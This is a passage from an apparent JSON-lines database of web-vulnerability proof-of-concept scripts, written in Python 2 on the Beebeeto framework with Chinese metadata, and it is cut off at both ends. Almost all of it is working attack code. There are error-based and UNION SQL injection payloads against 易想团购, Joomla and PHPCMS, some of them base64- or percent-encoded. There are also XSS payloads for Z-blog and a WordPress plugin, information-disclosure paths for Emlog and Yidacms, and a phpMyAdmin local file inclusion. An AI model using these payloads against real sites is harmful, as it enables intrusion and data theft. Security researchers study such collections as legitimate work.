'/search.asp?q=%3Ciframe%20src%3D%40%20onload%3Dalert%281%29%3E'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<iframe src=@ onload=alert(1)>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "search.asp\u5728\u5bf9\u7528\u6237\u63d0\u4ea4\u6570\u636e\u5904\u7406\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002", "app_name": "Z-blog", "id": "poc-2014-0184", "layer4_protocol": null}
+{"create_date": "2014-12-09 19:03:49", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /subscribe.php unsubscribe\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/subscribe.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0181',\r\n            'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /subscribe.php unsubscribe\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n            'vul_version': ['1.4'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/subscribe.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': [\r\n                'http://www.it165.net/safe/html/201308/701.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/subscribe.php?act=unsubscribe&code=YScgYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50K\"\r\n                   \"CopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHg3ZSxtZDUoNjY2KSwweDdlKS\"\r\n                   \"kpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMik\"\r\n                   \"peCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSM=\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        content = urllib2.urlopen(req).read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0181", "layer4_protocol": null}
+{"create_date": "2014-12-09 18:57:23", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /vote.php dovote\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/vote.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0180',\r\n            'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /vote.php dovote\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n            'vul_version': ['1.4'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/vote.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': [\r\n                'http://wooyun.org/bugs/wooyun-2010-03969',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(666),\"\r\n                   \"0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        content = urllib2.urlopen(req).read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0180", "layer4_protocol": null}
+{"create_date": "2014-12-09 18:39:09", "name": "\u6613\u60f3\u56e2\u8d2d v1.4 /ajax.php check_field\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ajax.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0178',\r\n            'name': '\u6613\u60f3\u56e2\u8d2d v1.4 /ajax.php check_field\u53c2\u6570 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u6613\u60f3\u56e2\u8d2d',\r\n            'vul_version': ['1.4'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u6613\u60f3\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ajax.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': [\r\n                'http://www.2cto.com/Article/201304/203406.html',\r\n                'http://vul.jdsec.com/index.php/vul/JDSEC-POC-20141208-1321',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/ajax.php?act=check_field&field_name=%61%27%20%61%6E%64%28%73%65%6C%65%63%74%20\"\r\n                   \"%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63\"\r\n                   \"%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20\"\r\n                   \"%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37\"\r\n                   \"%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D\"\r\n                   \"%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72\"\r\n                   \"%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F\"\r\n                   \"%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        content = urllib2.urlopen(req).read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        if '63e1f04640e83605c1d177544a5a0488' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "\u6613\u60f3\u56e2\u8d2d", "id": "poc-2014-0178", "layer4_protocol": null}
+{"create_date": "2014-12-09 18:08:15", "name": "Emlog <4.2.1 /content/cache/user \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "EMLOG\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/content/cache/user,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0177',\r\n            'name': 'Emlog <4.2.1 /content/cache/user \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'EMLOG',\r\n            'vul_version': ['<4.2.1'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['EMLOG\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/content/cache/user', 'php'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/content/cache/user ,  /content/cache/options',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-02955',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload1 = '/content/cache/user'\r\n        payload2 = '/content/cache/options'\r\n        verify_url = args['options']['target'] + payload1\r\n        verify_url2 = args['options']['target'] + payload2\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n            print '[*] Request URL: ' + verify_url2\r\n        # user\r\n        content = urllib2.urlopen(verify_url).read()\r\n        # options\r\n        content2 = urllib2.urlopen(verify_url2).read()\r\n        if args['options']['target'] in content2 and 'avatar' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/content/cache/user ,  /content/cache/options", "app_name": "Emlog", "id": "poc-2014-0177", "layer4_protocol": null}
+{"create_date": "2014-12-08 18:01:44", "name": "WordPress Sexy Squeeze Pages Plugin XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "nick233", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "WordPress\u63d2\u4ef6\u6f0f\u6d1e,XSS\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0176',\r\n            'name': 'WordPress Sexy Squeeze Pages Plugin XSS\u6f0f\u6d1e POC',\r\n            'author': 'nick233',\r\n            'create_date': '2014-12-08',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress',\r\n            'vul_version': ['*'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['WordPress\u63d2\u4ef6\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    Cross site scripting has benn found on instasqueeze/lp/index.php\r\n                    inurl:wp-content/plugins/instasqueeze\r\n                    ''',\r\n            'references': ['https://www.yascanner.com/#!/x/11200',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/wp-content/plugins/instasqueeze/lp/index.php?id=\"/><script>alert(233)</script>'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '\"/><script>alert(233)</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Cross site scripting has benn found on instasqueeze/lp/index.php\r\ninurl:wp-content/plugins/instasqueeze", "app_name": "WordPress", "id": "poc-2014-0176", "layer4_protocol": null}
+{"create_date": "2014-12-04 18:22:34", "name": "Yidacms v3.2 /Yidacms/user/user.asp \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Yidacms\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/Yidacms/user/user.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0172',\r\n            'name': 'Yidacms v3.2 /Yidacms/user/user.asp \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-04',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Yidacms',\r\n            'vul_version': ['3.2'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Yidacms\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/Yidacms/user/user.asp', 'asp'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/Yidacms/admin/admin_syscome.asp',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-074065',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/yidawap/syscome.asp?stype=safe_info'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '\u670d\u52a1\u5668\u76f8\u5bf9\u4e0d\u5b89\u5168\u7684\u7ec4\u4ef6\u68c0\u6d4b' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url']= verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/Yidacms/admin/admin_syscome.asp", "app_name": "yidacms", "id": "poc-2014-0172", "layer4_protocol": null}
+{"create_date": "2014-11-30 21:07:42", "name": "Joomla Component com_departments\u63d2\u4ef6 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Joomla\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,com_departments,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0170',\r\n            'name': 'Joomla Component com_departments\u63d2\u4ef6 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-11-30',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Joomla',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['Joomla\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'com_departments', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://sebug.net/vuldb/ssvid-19358',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/index.php?option=com_departments&id=-1 UNION SELECT 1,md5(666),3,4,5,6,7,8--\"\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'fae0b27c451c728867a567e8c1bb4e53' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Joomla", "id": "poc-2014-0170", "layer4_protocol": null}
+{"create_date": "2014-11-30 20:55:07", "name": "PHPCMS 2007 /digg_add.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "PHPCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/digg_add.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0169',\r\n            'name': 'PHPCMS 2007 /digg_add.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-11-30',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PHPCMS',\r\n            'vul_version': ['2007'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['PHPCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/digg_add.php', 'php'],\r\n            'desc': 'PHPCMS 2007 /digg_add.php mod\u53c2\u6570\u672a\u8fc7\u6ee4\u5e26\u5165sql\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165',\r\n            'references': ['N/A',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/digg/digg_add.php?id=1&con=2&digg_mod=digg_data WHERE 1=2 +and(select 1 from(\"\r\n                   \"select count(*),concat((select (select (select concat(0x7e,md5(3.1415),0x7e))) from \"\r\n                   \"information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.\"\r\n                   \"tables group by x)a)%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '63e1f04640e83605c1d177544a5a0488' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "PHPCMS 2007 /digg_add.php mod\u53c2\u6570\u672a\u8fc7\u6ee4\u5e26\u5165sql\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165", "app_name": "phpcms", "id": "poc-2014-0169", "layer4_protocol": null}
+{"create_date": "2014-11-29 00:11:56", "name": "PHPMyAdmin 4.2.12 /libraries/gis/pma_gis_factory.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "phpmyadmin\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,/libraries/gis/pma_gis_factory.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0168',\r\n            'name': 'PHPMyAdmin 4.2.12 /libraries/gis/pma_gis_factory.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-11-28',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpmyadmin',\r\n            'vul_version': ['4.2.12'],\r\n            'type': 'Local File Inclusion',\r\n            'tag': ['phpmyadmin\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', '/libraries/gis/pma_gis_factory.php', 'php'],\r\n            'desc': '''\r\n                    CVE-2014-8959(http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959)\r\n                    issue: http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php\r\n                    fix: https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5\r\n                    ''',\r\n            'references': ['http://bobao.360.cn/learning/detail/113.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        # Token & file_path, Modify their own.\r\n        token = 'ChangeME'\r\n        inclusion_file = '../../../ChangeMe.jpg%00'\r\n        tmp_url = args['options']['target'] + '/pma/gis_data_editor.php?token=' + token\r\n        verify_url = tmp_url + '&gis_data[gis_type]=' + inclusion_file\r\n        if args['options']['verbose']:\r\n            print '[*] Generation...'\r\n        print '[+] Specific use: ' + 'edit token, inclusion_file.'\r\n        print '[+] Generation ok'\r\n        print\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "CVE-2014-8959(http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8959)\r\nissue: http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php\r\nfix: https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5", "app_name": "PHPMyAdmin", "id": "poc-2014-0168", "layer4_protocol": null}
+{"create_date": "2014-11-27 18:22:15", "name": "WordPress HTML 5 MP3 Player with Playlist \u63d2\u4ef6\u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Wordpress\u63d2\u4ef6\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,html5-mp3-player-with-playlist\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0166',\r\n            'name': 'WordPress HTML 5 MP3 Player with Playlist \u63d2\u4ef6\u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-11-27',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # 